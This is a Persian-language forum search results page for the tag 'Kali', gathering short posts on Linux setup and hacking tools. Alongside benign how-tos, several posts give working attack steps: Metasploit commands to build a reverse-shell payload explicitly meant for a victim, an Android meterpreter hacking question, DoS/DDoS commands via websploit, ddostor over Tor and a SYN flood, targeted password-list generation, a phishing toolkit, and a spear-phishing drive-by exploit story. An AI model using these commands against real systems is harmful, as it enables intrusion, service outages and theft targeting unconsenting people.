iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'کالی'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

123 نتیجه پیدا شد

  1. owl

    Linux

    با سلام با اموزش نصب استیم بر روی لینوکس arch هستیم خب استیم یک شرکت فروش گیم است که گیمر ها ازش گیم را دانلود و به صورت ارجینال پلی میدهند اگر شما هم گیمر هستیم میتوانید از این اموزش استفاده کنید ابتدا ترمینال را باز کرده و دستور زیرا تایپ کنید : sudo pacman -Sy wine با دستور بالا wine نصب خواهد شد تا شما فایل های exe را اجرا کنید حالا با دستور زیر اقدام نصب استیم نمایید : pacman -Sy steam امید وارم خوشتان امده باشد با تشکر سوالی بود در بخش faq مطرح نمایید .
  2. با سلام میخوام در این بخش هم براتون میز کار Pantheon معرفی کنم خب این میزکار تقریبا میشه گفت محیطش شبیه مک هست و بنظرم خیلی زیباست و سرعتش زیاده خب میخوام به اموزش نصب این میزکار باهم بپردازیم . ابتدا مثل همیشه ترمینال را باز کنید و دستور زیرا تایپ کنید : sudo add-apt-repository ppa:elementary-os/daily با تایپ دستور بالا repository میزکار به لیست repository شما اضافه خواهد شد بعد با دستور زیر اوبونتو خود را اپدیت کنید sudo apt-get update و الان با دستور زیر اقدام نصب میزکار کنید : sudo apt install elementary-desktop خب حجم این میزکار که قبلا من دانلود کرده بودم دوره بر یک گیگ بود بعد از دانلود و نصب شدن با دستور زیر باید فایل هایی که از UI ساپورت نمیکنند رو حذف کنیم برای این کار دستور زیر میزنیم : sudo apt purge gnome-screensaver \ switchboard-plug-power switchboard-plug-bluetooth switchboard-plug-networking \ wingpanel-indicator-bluetooth wingpanel-indicator-network بعد از این که اینکار را انجام دادید با دستور زیر اقدام به اجرای میزکار نمایید . export DISPLAY=127.0.0.1:0.0; gala --x11& plank& wingpanel& با تشکر .
  3. بعضی وقتا در بعضی از لیوکس های برپایه debian مشکلاتی داردن هم چو نداشتن صدا بعد از لاگین کردن خب چنتا از دوستان قبلا هم همین مشکل رو داشتن برای حل این مشکل ترمینال را باز کنید و دستور زیر بزنید : systemctl --user enable pulseaudio && systemctl --user start pulseaudio در واقع درایو pulsaudio اکتیو نیست ما اکتیو میکنیم و با دستور start pulseaudio هم درایو رو استارت میکنیم اگر باز مشکل شما حل نشد از دستور زیر هم استفاده کنید : sudo apt-get install libasound2 خب با دستور بالا درایو libasound2 را نصب میکنیم اگر باز مشکلی داشتید در بخش faq مطرح کنید امید وارم مشکلات شما رو حل کرده باشم با تشکر .
  4. shadowcup

    Hacking-Virus

    سلام دوستان یه مشکل در زمینه ی هک گوشی های اندرویدی با کالی لینوکس داشتم لطفا اگه کسی میدونه راهنمایی کنه من از طریق متاسبلویت میتونم به گوشی نفوذ کنم ولی مشکل اینه که فقط دستگاه های داخل شبکه ی خودم قابل نفوذه یعنی فقط گوشی هایی که به وایفای خونه وصل هستن قابله هکه میخواستم بدونم دلیل این محدودیت چیه و چجوری میتونم رفع کنم ممنون کدی که وارد میکنم برای ساخت اینه mfsvenom -p android/meterpreter/reverse_tcp LHOST my ip***** LPORT 4444 R >/root/Desktop/...apk new terminal mfsconsole use multi/handler set payload android/meterpreter/reverse_tcp set LHOST ****** set LPORT ****** exploit
  5. در این ویدیو میبنید که دستورات عمومی لینوکسی رو براتون اماده کردم که یک سومش هستش بقیه اماده میشه ببنید ویدیو رو دستورات عمومی که برای کسی که میخواد با لینوکس کار کنه رو یاد میگیرید یا حق لینک دانلود https://anonfile.com/afq3cfkdb2/Record_2018_10_29_09_01_06_264_mp4 لینک دیدن انلاین ویدیو https://www.aparat.com/v/cPDx5 by nofozi
  6. Rednofozi

    Kali Linux

    برای این کار وارد ترمینال لینوکس شوید و دستور زیر را وارد کنید dpkg -i /root/chrome.deb دقت داشته باشید ادرس فایل در دستور بالا برای نمایش گزاشته شده است و شما باید ادرس فایل دانلود شده با نام صحیح ان را وارد کنید بعد از به اتمام رسیدن میتوانید از منو کالی لینوکس ان را جستجو و اجرا کنید در نسخه های مختلف لینوکس اجرا میشود درصورتی که در کالی لینوکس شما اجرا نشد یکی از فایل های سیستمی مرورگر را بعد از نصب کروم تغیر دهید و دستور زیر را برای بازکردن فایل وارد کنید leafpad /opt/google/chrome/google-chrome و در خط اخر ان ” –no-sandbox ” را اضافه کنیدو فایل را سیو کنید مجدد کروم را اجرا کرده و بدون مشکل میتوانید از ان استفاده کنید https://www.google.com/chrome/
  7. arman

    Hacking-Virus

    سلام دوستان امروز میخوایم با کالی لینوکس یک رات بسازیم که انتی ویروس های بدرد نخور و free نمیتوانند شناسایی کنند خب اول ترمینال رو بازی میکنیم و دستورات زیر را به ترتیب وارد میکنیم msfconsole ##باید یکم صبر کنید تا بیاد use payload/windows/x64/shell/reverse_tcp set LHOST Ip Adress Shoma set LPORT port buz shoma generate -t raw -f /root/Desktop/name payload.exe use multi/handler set PAYLOAD windows/x64/shell/reverse_tcp set LHOST ip adress shoma set LPORT port buz shoma exploit خب حالا برنامه ساخته شده روی دسکتاپتون را بدبد به قربانی به محض اجرا دسترسی براتون میا امیدوارم خوب قربانی بگیرید
  8. اموزش PenBox توضیحات بسیاری از متخصصان امنیت و تست نفوذ علاقه ای به داشتن سیستم عامل کالی لینوکس ندارند به دلایل مختلفی مثلا سنگین بودن سیستم عامل و کند کردن سیستم , نصب بودن ابزار های بی استفاده برای شخص و محیط گرافیکی و …. اما ابزار ها نقش مهمی برای ساده کردن تست نفوذ دارند به همین دلیل ما میتوانیم ابزار های دلخواه کالی لینوکس خود را داخل سیستم خود با حجم کم داشته باشیم ابزار PenBox این امکان را میدهد که ابزار های مورد نیاز خود را به ساده ترین و کم حجم ترین روش در سیستم خود داشته باشیم بدون استفاده از سیستم عامل جداگانه عملکرد ابزار این ابزار به زبان پایتون نوشته شده است و عملکردی دارد که باعث حجم بسیار پایین ان شده استاین عملکرد به گونه ای است بعد از انتخاب هر روش تست نفوذ ان ابزار دانلود و نصب به صورت اتوماتیک میشود که با سرعت بالایی که دارد این اتفاق در سریع ترین رمان ممکن می افتد نمونه ای از این ابزار ها nmap sqlmap Setoolkit jomlascan wpscan …. نصب اموزش PenBox پایتون بر روی سیستم نصب باشد ابتدا لینک را از قسمت دانلود دریافت کنید و جایگزین link در دستور پایین کنید و دستور را وارد کنید git clone link با دستور زیر ابزار را اجرا میکنیم penbox.py/. https://github.com/x3omdax/PenBox امکانات حملات به پسورد ها تست نفوذ وایرلس ابزار های اکسپلویت ابزار های شنود وب هکینگ (تست نفوذ وب)
  9. پیکربندی دستی تنظیمات شبکه کالی لینوکس پیکربرندی تنظیمات شبکه یکی از آسان ترین و پایه ای ترین کارها در لینوکس است. ابتدا اگر بخواهید تنظیمات شبکه خود را مشاهده کنید باید ابتدا وارد ترمینال بشوید و از دستور زیر استفاده کنید: ifconfig با دستور فوق می توانید پیکربندی های حاضر را مشاهده کنید.اگر لینوکس شما پیکر بندی شده باشید شما شاهد گزینه هایی مانند eth0 یا wlan0 هستید. Eth0 کارت نشاندهنده تنضیمات کارت شبکه شما است و wlan0 نشان دهنده کارت شبکه وایرلس شما است. فعال / غیر فعال کردن کارت شبکه و پیکربندی کالی لینوکس برای فعال یا غیر فعال کردت کارت شبکه باید از دستورات زیر پیروی کرد. برای غیر فعال کردن کارت شبکه ifconfig eth0 down و برای فعال کردن کارت شبکه if config eth0 up برای فعال کردن و غیر فعال کردن شبکه وایرلس هم از دستور بالا می توانید استفاده کنید. تنها کافی است بجای eth0 ، نام کارت شبکه وایرلس خود را بنویسید تنظیم دستی کارت شبکه این کار شامل ۴ مرحله است: تنظیم IP تنظیم Netmask تنظیم Getway تنظیم DNS تنظیم شبکه در ویندوز و لینوکس کاملا متفاوت است.جالب است بدانید که این کار در لینوکس ساده تر از ویندوز است. برای مثال فرض کنید میخواهید برای خود IP را به ۱۹۲٫۱۶۸٫۱٫۱۰ تغییر بدهید. برای اینکار کافی است دستور زیر را بزنید ifconfig eth0 192.168.1.10 به همین سادگی می توانید آدرس IP برای خود تنظیم کنید یا آن را تغییر دهید. سپس برای اطمینان از تغییر IP می توانید دوباره دستور ifconfig را بزنید و IP را مشاهده کنید. حال به سراغ Netmask می رویم.برای تنظیم Netmask از دستور زیر پیروی میکنیم ifconfig eth0 192.168.1.10 netmask 255.255.255.0 تا اینجا کار IP و Netmask را تنظیم کردیم تنظیم getway و پیکربندی کالی لینوکس دستور getway کمی متفاوت تر است اما سخت نیست .برای این کار از دستور زیر باید استفاده کنیم route add default gw 192.168.1.1 سپس برای اطمینان از اینکه Getway تنظیم شده است باید از دستور زیر استفاده کنیم route -n مرحله آخر ، تنظیم DNS در این مرحله باید DNS خود را تنظیم کنیم. پیشنهاد می شود ۲ DNS را تنظیم کنید. DNS های معروف ۸٫۸٫۸٫۸ و ۴٫۲٫۲٫۴ را تنطیم کنید.برای تنظیم این DNSها باید دستورات زیر را وارد کنید echo nameserver 8.8.8.8 > /etc/resolv.conf echo nameserver 4.2.2.4 >> /etc/resolv.conf برای اطمینان از اینکه DNS ها تنظیم شده اند، دستور زیر را وارد کنید: Leafpad /etc/resolv.conf امیدوارم از این آموزش پیکربندی کالی لینوکس لذت برده باشید در ادامه اموزش هک با ما همراه باشید
  10. یکی از ابزارهای معروف هکینگ و اتکینگ بی شک ابزار websploit هست که با قابلیت های (wifijammer,wifi attacking, webkiller و ...) خلاصه ما در این اموزش از webkiller استفده میکنیم ابتدا ترمینال را باز کنید و با دستور زیر اقدام به نصب websploit بکنید : sudo apt-get install websploit با دستور بالا اقدام نصب این ابزار میشود بعد از نصب ابزار با دستور websploit ابزار را اجرا کنید و دستور زیر را بنویسید : use network/webkiller و بعد با دستور : set target target.com شما به جای target.com سایت مورد هدف را قرار بدید و بعد با دستور run اقدام به اجرای اتک کنید این به نظرم بسیاری از ابزار ها قدرت مند تر هست . با امید موفقیت امید وارم خوشتان امده باشد .
  11. owl

    Hacking-Ddos

    یکی از بهترین دیداسر های در زمینه اتک دیداسر tor هست که بدون شناسایی ایپی شما عملیات را انجام میدهد و قدرت زیادی نسبت به دیداسر های دیگری دارد . ابتدا با دستور زیر اقدام به دانلود ddostor کنید . git clone https://github.com/thelinuxchoice/ddostor.git بعد از دانلود شدن با دستور cd به دایرکتوری ddostor بروید . با دستور زیر اجرا کنید : bash ddostor.sh بعد از اجرا از شما target میخواهد ادرس تارگنت خود را بدید بعد از شما پورت میخواهید معمولا پورت 80 بعد از شما تعداد پکد هارا میخواد 6000 وارد کنید بعد دیداسر اقدام به انجام عملیات دیداس میکند امید وارم خوشتان امده باشد .
  12. با سلام به کاربران عزیز تیم anonysec به علت برخی مشکلات نتوانستم پست بزارم ولی از این به بعد براتون پست های ناب میزارم ساخت پسورد لیست با ابزار passgen : ابتدا ترمینال را در کالی لینوکس باز کنید و دستور زیر را بنویسید تا ابزار دانلود شود . git clone https://github.com/Ethical-H4CK3R/PassGen بعد از این با دستور cd به دایرکتوری ابزار بروید معمولا cd /root/passgen هست بعد با دستور python passgen.py ابزار را راه اندازی کنید برای متود های ساخت پسورد لیست از شما گذینه هایی میخواهید مثلا set first_name nametarget با زدن دستور بالا نام پسورد لیست را وارد میکنیم تا از ان نام استفاده کند برای تاریخ تولد birthday و برای شهرت set last_name و برای شهر یا مکان set street_name بعد از تکمیل کردن گذینه با دستور generate میتوانید پسورد لیست را بسازید پسورد لیست در فولدر ابزار با اسم passgen.lst سیو میشه . ساخت پسورد لیست با ابزار crunch : یکی از ابزار های پر قدرت در زمینه کرکینگ و ساخت پسورد لیست ابزار crunch هست ولی یکی از مشکلات ان زیاد شدن حجم پسورد لیست است . ابتدا ترمینال را باز کنید و دستور زیر را بنویسید crunch 4 12 blackpetyaanonysec -o /root/desktop/passlist.txt خب من در کد بالا گفتم تعداد کلمات استفاده شده در پسوردلیست حداقل 4 کلمه و حد اکثر 12 کلمه جا بگیره و از متن blackpetyanonysec استفاده کنه و در مسیر دسکتاپ سیو کنه برای مثال میخواید یک کلمه ای را پرورش بدید کافیه از دستور زیر استفاده کنید crunch 4 12 #!$%^&*$ -t black@@anonysec@@ -o /root/desktop/passlist.txt هم استفاده کنید در این کد میگوییم از کد های #!$%^&* استفاده کن به جای @@ ها و سیو کن در دسکتاپ. امید وارم خوشتان امده باشد تا اموزش های بعدی خدا نگه دار
  13. اسکنر های امنیتی مختلفی را در دنیای iT مشاهده میکنیم که هر کدام از ان ها ضعف و نقاط قوتی دارند اما یکی از مهمترین مشکلات اسکنر های غیر رایگان , گران بودنشان است که بسیاری به همین دلیل یا نمیتوانند از اسکنر ها استفاده کنند یا از نسخه های کرک شده بی کیفیت استفاده میکنند اما اسکنر های رایگانی وجود دارند که بسیار خوب عمل میکنند یکی از این اسکنار های معروف و رایگان اسکنر w3af میباشد این نسخه به قدری محبوب است که در نسخه های قدیمی تر کالی لینوکس وجود داشت اما به دلایلی در نسخه های جدید وجود ندارد حال برای نصب این اسکنر کافیست به صورت دستی در هر سیستم عاملی نصب کنیم که در ادامه با نحه نصب و استفاده از ان اشنا میشویم. سیستم عامل ها قابل نصب در انواع سیستم عامل ها از جمله لینوکس ,مک و ویندوز میباشد امکانات و اموزش w3af امکان استفاده از پروکسی ارسال درخاست های HTTP کش کردن DNS UserAgent اسپوف برسی هدر های امنیتی برسی کوکی ها امکان استفاده از ابزار به دو صورت گرافیکی و کنسول امکان جستحوی باگ های حساس XSS و SQL injection اموزش نصب w3af در لینوکس از بخش دانلود لینک لینوکس را دریافت کنید و جایگزین Link در دستور زیر کنید git clone Link وارد پوشه دانلود شده شوید cd w3af حال برای اجرا برنامه به صورت گرافیکی از دستور زیر استفاده کنید ./w3af_gui درصورتی که میخواهید از محیط کنسول استفاده میکنید دستور زیر را برای اجرا وارد کنید ./w3af_console اموزش نصب w3af در ویندوز از بخش دانلود فایل exe ابزار را دریافت و اقدام به نصب کنید اموزش استفاده در محیط گرافیکی در محیط گرافیکی در قسمت مشخص شده در تصویر ادرس وبسایت مورد نظر را برای اسکن اسیب پذیری وارد کنید و از قسمت پلاگین تیک بخش های مورد نظر برای تست اسیب پذیری را بزنید در صورتی که بخشی را نیاز ندارید تیک را بردارید تا اسکن سریع تر انجام شود همچنین از قسمت profiles انواع اسیب پذیری ها و اسکن های سرور را مشاهده و مناسب با نیاز خود فعال و غیر فعال کنید و از قسمت log پروسه انجام تست اسکنر را مشاهده کنید اموزش w3af در محیط کنسول وارد بخش کنسول شوید و دستور help را وارد کنید سویچ های راهنمای اموزش w3af نشان داده میشود و برای اسکن وب سایت دستور start را وارد کنید , در تصویر زیر سویچ راهنما را مشاهده کنید دانلود ابزار w3af GitHub - andresriancho/w3af: w3af: web application attack and audit framework, the open source web vulnerability scanner. w3af download | SourceForge.net
  14. Rednofozi

    Kali Linux

    امکانات HTTP Server پشتیبانی از DNS Server پشتیبانی از DHCP Server حملات فیشینگ اکسس پوینت در وایرلس Session Hijacking حملات MITM حملات DOS اتصال به دیتابیس MySQL بروز رسانی ابزار سیستم عامل های قابل نصب توزیع های لینوکس ۱٫ Ubuntu ۲٫ BackTrack Linux ۳٫ BackBox Linux اموزش نصب نصب در لینوکس دبیان dpkg -i ghost-phisher_1.5_all.deb نصب در توزیع های دیگر لینوکس git clone link-git اجرا python ghost.py اجرا در کالی لینوکس دستور زیر ghost-phisher لینک دانلود ابزار Ghost Phisher | Penetration Testing Tools GitHub - savio-code/ghost-phisher: Automatically exported from code.google.com/p/ghost-phisher
  15. port spider ابزاری برای اسکن پورت در کالی port spider ابزاری برای اسکن پورت در کالی میباشد!!! لینک ابزار port spider در گیت هاب : GitHub - xdavidhu/portSpider: ? A lightning fast multithreaded network scanner framework with modules.
  16. حمله DOS DOSمخفف کلمه denial of service است. معنی لغوی این حمله، حمله انکار سرویس یا انکار خدمات است.اساس این حمله به این شکل است که درخواست های جعلی بسیار زیادی به سمت یک سرور می فرستد. تعداد پکت های ارسالی آنقدر بالا است که سرور توانایی پاسخ دادن به تمام پکت ها را ندارد و از کار می افتد.این حمله در شکل های مختلی و در سناریو های مختلفی اتفاق می افتد. در حمله DOS پکت های ارسالی تنها از سمت یک کامپیوتر ازسال می شود. با بلاک کردن IP کامپیوتر مهاجم تا حدودی و براحتی می توانید از دست اینگونه حملات راحت بشوید.اما این موضوع برای حملات DDOS صدق نمی کند. اما DDOS چیست؟ DDOS مخفف distributed denial of service است. در لغت به معنی حمله انکار سرویس توزیع شده است. در این حمله مهاجم از طریق کامپیوتر ها و IP های بسیار زیادی به سرور حمله میکند. آنها با آلوده کردن تعداد زیادی از کاربران خانگی و عادی، از آنها در حملات DDOS خود سواستفاده می کنند.در اینجا برای رهایی از DDOS کار کمی سخت تر می شود. چون هزاران هزار IP در حال فرستادن پکت هستند و شما نمی توانید با بلاک کردن IP آنها ، از شرشان راحت شوید.البته بلاک کردن IP تنها یک راه حل برای گریز از این حملات هست و متاسفانه مهاجمان روش های دور زدن کار را وقتی که IP شان بلاک می شود خوب بلدند. برای رهایی از شر این حملات راه حل های بسیاری وجود دارد. در ادامه آموزش قصد داریم به آموزش حمله DOS با کالی لینوکس بپردازیم حمله DOS با کالی لینوکس وارد کالی لینوکس خود شوید و ترمینال را باز کنید و با دستور زیر وارد فریمورک متاسپلویت شوید msfconsole فرآیند باز شدن متاسپلوت شاید چند دقیقه زمان نیاز داشته باشد. برای حمله DOS ما باید از auxiliary ها یا همان بخش کمکی در متاسپلویت کمک بگیریم. نام این auxiliary که در این اموزش استفاده میکنیم ، auxiliary/dos/tcp/synflood است و براحتی با دستور زیر از آن استفاده میکنیم: use auxiliary/dos/tcp/synflood این نوع حمله، حمله DOS از نوع SYN است.به اینصورت که ما تعداد پکت های بسیار زیادی را با flag SYN=1 برای سرور می فرستیم.اما اگر SYN برابر ۱ باشد چه اتفاقی می افتد؟ در این حال مهاجم به سرور می گوید که تمایل دارد ارتباط برقرار کند. مسلما اگر کاربر عادی باشید ارتباط برقرار میشود. اما در روش توضیح داده شده مشاهده شده که در ثانیه ۲۰۰۰ پکت با SYN=1 برای سرور ارسال شده است. این حالت شبیه این است که در هر ثانیه ۲ هزار کاربر وارد سایت شود و خارج نشود فشرده سازی در لینوکس و در زمانی که سرور هنوز جواب این ۲ هزار تار را نداده است، در ثانیه دوم، ۲ هزار دیگر وارد شوند.مسلما عملکرد سرور به مشکل بر میخورد. بعد از استفاده از این auxiliary شما باید دستور زیر را بزنید تا تنظیمات آن را مشاهده کنید و آن را تنظیم کنید. show options سپس RHOST و RPORT آن را تنظیم کنید.RHOST باید IP تارگت باشد و RPORT هم پورتی است که به آن پکت فرستاد می شود.با دستورات زیر آن هارا تنظیم می کنید. set LHOST targetip set RPORT randomport تنظیمات دیگری هم دارد که در صورت نیاز می توانید آن ها را مانند بالا تنظیم کنید.برای اجرا شدن حمله DOS تنها کافی است با دستور زیر، آن را اجرا کنید exploit کار تمام است. برای توقف این حمله تنها کافی است پنجره ترمینال را ببندید با با زدن ctrl+z از آن خارج شوید. تذکر مهم: لطفا از آموزش ارائه شده فقط برای مقاصد امنیتی مانند تست نفوذ و تست قدرت سرور استفاده کنید و برای مقاصد مخرب استفاده نکنید.تیم امنیتیanonysec هیچگونه مسولیتی را در قبال استفاده نامناسب از این آموزش را متقبل نمی شود
  17. کالی لینوکس امروزه سیستم عامل ها تنوع زیادی دازند و سیستم عامل ها مختلفی برای تست نفوذ به وجود امده است اما کالی لینوکس یک OS بسیار عالی و حرفه ای میباشد که چندین سال قبل هم با نام Backtrack فعال بوده است و همکنون محبوب ترین بین متخصصان تست نفوذ میباشد این سیستم عامل محبوبیت خود را از ابزار های درون خود گرفته است ابزار های محبوب و کاربردی هکر ها را در خود جای داده است برای نمومه میتوان به یکی از بهترین آن ها متاسپلویت اشاره کرد که پیچیدگی و کاربرد های خود را دارد امکانات کالی لینوکس نصب بیش از ۳۰۰ ابزار کاربردی تست نفوذ و امنیت و امکان نصب انواع ابزار ها قابل نصب دو محیط کنسول و گرافیکی گنو بسیار ساده و زیبا امکان نصب در مجازی ساز ها و حتی در کنار OS های دیگر امکان اجرا بصورت Live یا زنده از طریق فلش یا DVD قابلیت نصب کالی لینوکس در ویندوز دانلود کالی لینوکس برای دانلود کالی لینوکس نسخه های مختلفی وجود دارد نسخه iso برای بوت و نصب عادی قابل نصب در ورژن های مختلف برای مجازی ساز ها VMware VM Vbox Hyper-V دانلود سیتم عامل کالی Official Kali Linux Downloads
  18. دستور زیر استفاده کنید: ifconfig با دستور فوق می توانید پیکربندی های حاضر را مشاهده کنید.اگر لینوکس شما پیکر بندی شده باشید شما شاهد گزینه هایی مانند eth0 یا wlan0 هستید. Eth0 کارت نشاندهنده تنضیمات کارت شبکه شما است و wlan0 نشان دهنده کارت شبکه وایرلس شما است. فعال / غیر فعال کردن کارت شبکه و پیکربندی کالی لینوکس برای فعال یا غیر فعال کردت کارت شبکه باید از دستورات زیر پیروی کرد. برای غیر فعال کردن کارت شبکه ifconfig eth0 down و برای فعال کردن کارت شبکه if config eth0 up برای فعال کردن و غیر فعال کردن شبکه وایرلس هم از دستور بالا می توانید استفاده کنید. تنها کافی است بجای eth0 ، نام کارت شبکه وایرلس خود را بنویسید تنظیم دستی کارت شبکه این کار شامل ۴ مرحله است: تنظیم IP تنظیم Netmask تنظیم Getway تنظیم DNS تنظیم شبکه در ویندوز و لینوکس کاملا متفاوت است.جالب است بدانید که این کار در لینوکس ساده تر از ویندوز است. برای مثال فرض کنید میخواهید برای خود IP را به ۱۹۲٫۱۶۸٫۱٫۱۰ تغییر بدهید. برای اینکار کافی است دستور زیر را بزنید ifconfig eth0 192.168.1.10 به همین سادگی می توانید آدرس IP برای خود تنظیم کنید یا آن را تغییر دهید. اموزش Wifite 2 تست نفوذ به وایرلس سپس برای اطمینان از تغییر IP می توانید دوباره دستور ifconfig را بزنید و IP را مشاهده کنید. حال به سراغ Netmask می رویم.برای تنظیم Netmask از دستور زیر پیروی میکنیم ifconfig eth0 192.168.1.10 netmask 255.255.255.0 تا اینجا کار IP و Netmask را تنظیم کردیم تنظیم getway و پیکربندی کالی لینوکس دستور getway کمی متفاوت تر است اما سخت نیست .برای این کار از دستور زیر باید استفاده کنیم route add default gw 192.168.1.1 سپس برای اطمینان از اینکه Getway تنظیم شده است باید از دستور زیر استفاده کنیم route -n مرحله آخر ، تنظیم DNS در این مرحله باید DNS خود را تنظیم کنیم. پیشنهاد می شود ۲ DNS را تنظیم کنید. DNS های معروف ۸٫۸٫۸٫۸ و ۴٫۲٫۲٫۴ را تنطیم کنید.برای تنظیم این DNSها باید دستورات زیر را وارد کنید echo nameserver 8.8.8.8 > /etc/resolv.conf echo nameserver 4.2.2.4 >> /etc/resolv.conf برای اطمینان از اینکه DNS ها تنظیم شده اند، دستور زیر را وارد کنید: Leafpad /etc/resolv.conf امیدوارم از این آموزش پیکربندی کالی لینوکس لذت برده باشید در ادامه اموزش هک با ما همراه باشید
  19. Rednofozi

    Kali Linux

    سلام در این ویدیو میبنید چطوری وردپرس میشه با کالی هک کرد یا حق rednofozi wpscan.mp4 - AnonFile https://www.aparat.com/v/a458w
  20. Dmitry یکی از آن ابزارهای کوچک است که این خصوصیت آن نتوانسته بر روی عملکرد و مقبولیت آن اثر منفی بگذارد. این ابزار یکی از ابزارهای محبوب برای پیدا کردن اطلاعات درباره یک سایت است. فقط کافیست که این ابزار را از منو و یا محیط دستوری اجرا کنیم. دستور "Dmitry –s SomeDomainName.com" اسکنی شبیه به آن چه که در بخش معرفی ابزار Recon-NG گفته شد را انجام میدهد. Netdiscover -- این ابزار نیز یکی دیگر از ابزارهای کاردرستی! است که در کالی قرار داده شده است. این نرم افزار نیز مانند Dmitry میتواند هم از طریق منو و هم از طریق محیط دستوری اجرا شود. Netdiscover یک شبکه را به منظور پیدا کردن دیوایس های موجود اسکن کرده و آن ها را نشان میدهد: این نرم افزار همچنین در حالت پسیو هم اجرا میشود؛ طوریکه هیچگونه دیتایی ارسال نمیکند و فقط ترافیک را شنود خواهد نمود. Zenmap این نرم افزار را میتوان نسخه گرافیکی دستور محبوب nmap دانست. اگر با این دستور آشناییت ندارید، Zenmap میتواند نقطه شروع خوبی برای شما باشد. درست مانند دستورات گذشته Zenmap نیز از دو طریق منو و یا محیط دستوری اجرا میشود. پس از شروع کار شما با صفحه زیر روبرو خواهید شد: فقط آدرس IP مقصد و نوع اسکنی که میخواهید انجام شود را مشخص کنید. نگران نباشید. این نرم افزار هرآنچه را که دستور nmap پیش از این بشما نشان میداد را در نتایج خود به شما نشان خواهد داد. برای شروع کار دکمه "Scan" را کلیک کرده تا دستور اجرا شود: همانطور که میبینید، وضعیت دستور nmap در پنجره "Nmap Output" نشان داده شده است. اطلاعات دیگر را میتوان با تغییر تب های موجود در بالای صفحه مثل Ports//Host مشاهده کرد: تب Host Details: خوب دوستان علت آن که بطور مختصر به معرفی این سه ابزار پرداختیم اینست که کار کردن با ان ها آنقدر ساده است که نیاز به معرفی بیشتر حس نمیشود
  21. جمع آوری بالقوه اطلاعات یا جمع آوری اطلاعات بصورت پسیو، فرآیند جمع آوری اطلاعات درباره هدف با استفاده از اطلاعات عمومی موجود در این زمینه است. این فرآیند میتواند شامل سرویس هایی نظیر نتایج موتور جستجو، اطلاعات whois، اطلاعات عمومی شرکت یا به عبارت دیگر هرگونه فعالیت جهت جمع آوری اطلاعات درباره هدف بدون کوچکترین برقراری ارتباط با آن، باشد. منظور از بالقوه نیز این‌ست که در این فرآیند هیچگونه ارتباطی خصوصا بصورت مستقیم با هدف برقرار نمیشود.همانند سایر زمینه های موجود در زندگی، در اینجا نیز این موضوع صدق میکند که آماده سازی و آمادگی منجر به پیروزی و موفقیت خواهد شد. مخصوصا در این زمینه این موضوع بیشتر خود را نشان میدهد چرا که قبل از حمله، هرچه که اطلاعات جمع آوری شده ما از هدف بیشتر باشد، یک قدم ما را به موفقیت نزدیکتر خواهد نمود. ذکر یک سناریو واقعی! اگر بخواهیم یک مثال خوب از جمع آوری بالقوه اطلاعات بزنیم، میتوانیم اتفاقی را که در حین فرآیند تست نفوذ از یک شرکت کوچک، چندین سال پیش رخ داده است را نقل کنیم. در این شرکت تقریبا هیچگونه دسترسی اینترنت وجود نداشت (دسترسی حداقلی) و فقط تعداد کمی از سرویس ها از بیرون در معرض دیده شدن قرار داشتند که آن ها نیز بصورت ثابت امن شده بودند. بعد از ساعت ها جستجو در موتورهای جستجو جهت یافتن کوچکترین اطلاعاتی از این شرکت، سرانجام در یک سایت فروم (مخصوص جمع آوری تمبر)، پستی از طرف یکی از کارمندان آن شرکت ایجاد شده بود مبنی بر اینکه ایشان بدنبال مجموعه تمبرهای کمیاب مربوط به دهه1950 بودند. و در ادامه جهت تماس از ایمیل سازمانی و شماره تلفن خود استفاده کرده بود.این دقیقا همان چیزی بود که یک هکر زرنگ جهت اجرای یک حمله نیمه پچیده Client-side به آن نیاز داشت. برای این کار بسرعت دامینی با نام "rare-stamps-trade.com" ثبت شد و در صفحه اصلی آن طراحی طوری صورت پذیرفت که تمبرهای نایاب دهه 1950که از جستجوی گوگل بدست آمده بودند، قرار گرفتند. نام دامین و طراحی صفحه اصلی به گونه ای بود که اطمینان هر بازدید کننده ای مبنی این که این سایت در زمینه تجارت تمبرهای نایاب فعالیت میکند را جلب میکرد. قدم بعدی جاساز کردن چندین HTML آلوده در کد سایت بود که حاوی کد اکسپلویت (باگ امنیتی) آخرین نسخه IE آنموقع (MS05-001) بود. قدم بعدی تماس با شخص مورد نظر و ترغیب وی به بازدید از وب سایت است. برای این کار به شخص مورد نظر گفته شد که "از پدربزرگ خدابیامرز من (شخص هکر) مجموعه تمبری باقی مانده است که قصد دارم بخشی از آن ها را به فروش برسانم." زمان تماس به نوعی برنامه ریزی شده بود که در ساعت کاری باشد تا احتمال چک کردن سایت از دفتر کار ( و نه از خانه) به حداکثر برسد. کارمند مورد نظر بی خبر از همه جا و خوشحال از تماس هکر، بدون معطلی اقدام به بازدید از 